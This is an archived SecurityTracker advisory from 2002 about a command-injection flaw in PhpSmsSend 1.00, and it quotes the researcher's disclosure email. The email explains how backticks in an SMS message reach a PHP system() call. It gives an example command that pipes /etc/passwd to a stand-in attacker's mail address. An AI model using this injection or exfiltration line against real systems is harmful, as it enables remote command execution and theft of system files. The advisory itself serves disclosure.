SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Server/CGI)  >  PhpSmsSend Vendors:  Calmejane, Christophe
PhpSmsSend Front-End to SmsSend Allows Remote Users to Execute Arbitrary System Commands on the Server
SecurityTracker Alert ID:  1003395
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 30 2002
Impact:  Execution of arbitrary code via network, User access via network
Version(s): 1.00
Description:  A vulnerability was reported in the PhpSmsSend frontend to SmsSend. A user can execute arbitrary commands on the web server.

A remote user can supply an SMS message to the PhpSmsSend application to execute arbitrary shell commands on the web server. This is reportedly due to the following code from file.php :

$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
system($str,$res);

A remote user can enter an SMS message containing a backtick character ("`") so that the text following the backtick (and preceding the next backtick) will be executed by the system() call.

The command will be executed with the privileges of the web server.
Impact:  A user can execute arbitrary system commands on the web server with the privileges of the web server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  zekiller.skytech.org/smssend.php (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Indra Kusuma <indra@kusuma.or.id>
Message History:   This archive entry has one or more follow-up message(s) listed below.
May 22 2002 (Vendor Issues Fix) Re: PhpSmsSend Front-End to SmsSend Allows Remote Users to Execute Arbitrary System Commands on the Server
The vendor has issued a fix.


 Source Message Contents
Date:  Tue, 29 Jan 2002 18:57:51 +0000 (GMT)
From:  Indra Kusuma <indra@kusuma.or.id>
Subject:  PhpSmsSend remote execute commands bug

 


---[ PhpSmsSend remote execute commands bug
  
---[ About PhpSmsSend
        
   PhpSmsSend is a frontend to the SmsSend application. It consists of a
.php file, from which you select one of the available scripts, and then
you can send an SMS wherever you want, all around the world.

PhpSmssend's website is http://zekiller.skytech.org/smssend.php

---[ Affected System

  PhpSmsSystem Version 1.00

---[ Description

from file .php :

      $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
      system($str,$res);

if the sms messages contain a backtick "`" then inside of backtick will be 
execute as a system command.

the result of the command will send via sms :), so the command output
should be less than 160 characters to send via sms, but if the command
using pipe (ex : cat /etc/passwd|mail evil@hacker.com) or redirection then 
the messages status is successfully :)

---[ Greetz

my Guru GaniSalman, my friend OpsCrew, #indoSniffing and 
#medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM 
(lug.stikom.edu), and the gauli.com owner


---

cheers,


IndraKusuma


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC